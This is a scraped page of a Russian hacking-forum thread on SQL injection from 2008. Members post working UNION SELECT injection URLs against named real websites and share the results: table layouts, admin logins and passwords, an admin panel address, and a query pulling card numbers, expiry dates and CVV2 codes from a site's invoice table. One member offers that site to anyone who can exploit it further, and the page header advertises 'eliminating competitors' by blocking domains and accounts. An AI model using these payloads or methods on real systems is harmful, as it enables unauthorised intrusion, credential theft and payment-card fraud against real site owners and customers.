Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 593 из 1242

593

Опции темы

Поиск в этой теме

Опции просмотра

#5921

09.07.2008, 06:21

sabe

Постоянный

Регистрация: 16.03.2007

Сообщений: 380

Провел на форуме:
1404552

Репутация: 568

Отправить сообщение для sabe с помощью ICQ

Отправить сообщение для sabe с помощью AIM

Отправить сообщение для sabe с помощью Yahoo

Academicjournals.net

Цитата:

http://www.academicjournals.net/2/archive.php?id=999999+union+select+1,2,3,4,5,6,7,8 ,9,10,11/*&theme=2&jid=ijv

жаль.. негмогу получить вывод (

Цитата:

http://www.academicjournals.net/2/archive.php?id=-1+union+select+1,table_name,3,4,5,6,7,8,9,10,11+fr om+information_schema.tables/*&theme=2&jid=ijv

зато ясно что эт 4 версия. поетому и забил (

Цитата:

http://www.palmetto-records.net/artist.php?id=1'

тут поидее чтото странное.... union и select не опознаны)))

Цитата:

http://www.the213.net/php/article.php?id=99999+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20/*

хмм.. 20 перебрал и хз.......

Цитата:

http://www.torrentreactor.net/browse.php?id=3.inc.php)+union+select+1/*

не уверен что эт иньекция..

Lexeon

Цитата:

http://books.dovidka.com.ua/index.php?cat=999999999+union+select+password+from +test.users/*

вот правильная база..... но это сиравно тест.

Цитата:

database books

dir
1 : parent
2 : title
3 : image
4 : type
5 : author
6 : format
7 : pages
8 : palitura
9 : mova
10 : pereklad
11 : anot
12 : auditor
13 : image1
14 : sortir
15 : price
16 : pdf
17 : pdf1
18 : znyzhka
19 : sold
20 : weight
21 : xdate
22 : zamov1
23 : zamov2
order_cont
1 : item
2 : quan
3 : price
orders
1 : zamov
2 : tel
3 : addr
4 : xdate
5 : pindex
6 : organ
7 : pos
8 : email
9 : otrym
10 : opr
11 : zamov2
12 : zamov1
parms
1 : price_margin
2 : price_lower
3 : price_upper
4 : t1
5 : t2
6 : t3
7 : t4
8 : t5
9 : code1
10 : code2
11 : code3

database test

users
1 : password

Последний раз редактировалось sabe; 09.07.2008 в 06:53..

#5922

09.07.2008, 07:38

gisTy

Постоянный

Регистрация: 24.05.2008

Сообщений: 589

Провел на форуме:
3629857

Репутация: 504

Цитата:

Сообщение от Lexeon

...

не работает потому что таблица находится в другой базе..
так определяем название базы и название таблицы...

Цитата:

http://books.dovidka.com.ua/index.php?cat=999999999999+union+select+concat_ws( 0x2e,table_schema,table_name)+from+information_sch ema.tables+limit+20,1/*

ну а вот собственно и сам выбор из таблицы.. и заметь, что все работает и выводит

Цитата:

http://books.dovidka.com.ua/index.php?cat=999999999999+union+select+concat_ws( 0x3a3a,username,password)+from+test.users/*

Последний раз редактировалось gisTy; 09.07.2008 в 08:02..

#5923

09.07.2008, 15:00

The matrix

Reservists Of Antichat - Level 6

Регистрация: 09.07.2008

Сообщений: 102

Провел на форуме:
1744345

Репутация: 573

Отправить сообщение для The matrix с помощью ICQ

ух что я нашел...

Код:

http://www.snipersister.de/wap/wapmain.php?option=onewsaction=linkid=-1+union+select+1,2,3,convert(aes_decrypt(aes_encrypt(concat(email,0x3a,username,0x3a,password),0x71),0x71),binary),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users--

вывод в цикле всегда радовало это

в антибояне нет

#5924

09.07.2008, 15:10

$p01nt

Участник форума

Регистрация: 19.02.2008

Сообщений: 186

Провел на форуме:
584540

Репутация: 96

в антибояне нет

www.u10.ru

Уязвимость в:

Скрипте показа страниц(http://u10.ru/index.php?menu=category&id=3')

Колонки:

http://u10.ru/index.php?menu=category&id=-3+union+select+1,2/*

Информация о базе:

Версия: 4.1.21-standard
Пользователь: u10_u10@localhost

#5925

09.07.2008, 15:19

The matrix

Reservists Of Antichat - Level 6

Регистрация: 09.07.2008

Сообщений: 102

Провел на форуме:
1744345

Репутация: 573

Цитата:

Сообщение от $p01nt

А че недокопать-то....

Код:

http://u10.ru/index.php?menu=category&id=-3+union+select+1,convert(concat_ws(0x3a,name,pass),binary)+from+admin--

#5926

09.07.2008, 15:21

Rebz

Super Moderator

Регистрация: 08.11.2004

Сообщений: 3,395

Провел на форуме:
13166814

Репутация: 3876

Цитата:

http://u10.ru/index.php?menu=category&id=-3+union+select+1,2/*

он весь дырявый.

Добро пожаловать в панель администрирования
сайтом http://u10.ru/

Сайт разработки бажный..

Последний раз редактировалось Rebz; 09.07.2008 в 15:26..

#5927

09.07.2008, 15:21

slider

Members of Antichat - Level 5

Регистрация: 04.09.2005

Сообщений: 528

Провел на форуме:
6520559

Репутация: 2947

Цитата:

Сообщение от $p01nt

_http://u10.ru/index.php?menu=category&id=-3+union+select+1,concat(name,char(58),pass)+from+a dmin+limit+0,1/*

Цитата:

111:111222

http://u10.ru/admin/admin.php

#5928

09.07.2008, 15:31

Rebz

Super Moderator

Регистрация: 08.11.2004

Сообщений: 3,395

Провел на форуме:
13166814

Репутация: 3876

slider, ага.
rpanel.info - rpanel/pfobnf

#5929

09.07.2008, 16:42

The matrix

Reservists Of Antichat - Level 6

Регистрация: 09.07.2008

Сообщений: 102

Провел на форуме:
1744345

Репутация: 573

Ещё тема любви тут была... После нескольких нехитрых трюков с information_schema получаем:

Цитата:

http://www.lovetime.ru/search_form.php?rub_tablename=love_main+union+sele ct+1,2,aes_decrypt(aes_encrypt(concat_ws(0x3a,user _id,paswd321),0x71),0x71),4,5,6,7,8+from+love_inc--&raz_tablename=love_stihi

#5930

09.07.2008, 17:14

sabe

Постоянный

Регистрация: 16.03.2007

Сообщений: 380

Провел на форуме:
1404552

Репутация: 568

Acte.org - PR 6

Цитата:

http://www.acte.org/resources/press_release.php?id=999999+union+select+1,2,3,con cat_ws(0x3a,login,password),5,6,7,8,9+from+users+l imit+0,1/*

получаем данные.. токо хз откуда они )

Цитата:

http://www.acte.org/resources/press_release.php?id=999999+union+select+1,2,3,con cat_ws(0x3a,username,password),5,6,7,8,9+from+com_ logins+limit+0,1/*

еще... пассы

Цитата:

http://www.acte.org/resources/press_release.php?id=999999+union+select+1,2,3,con cat_ws(0x3a,card_num,exp_date,cvv2,card_type,name, street,zip),5,6,7,8,9+from+invoice_cc+limit+0,1/*

ну и картон собственно )

кто сможет чтот с этим сайтом сделать пишите в личку )

Страница 593 из 1242

593

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход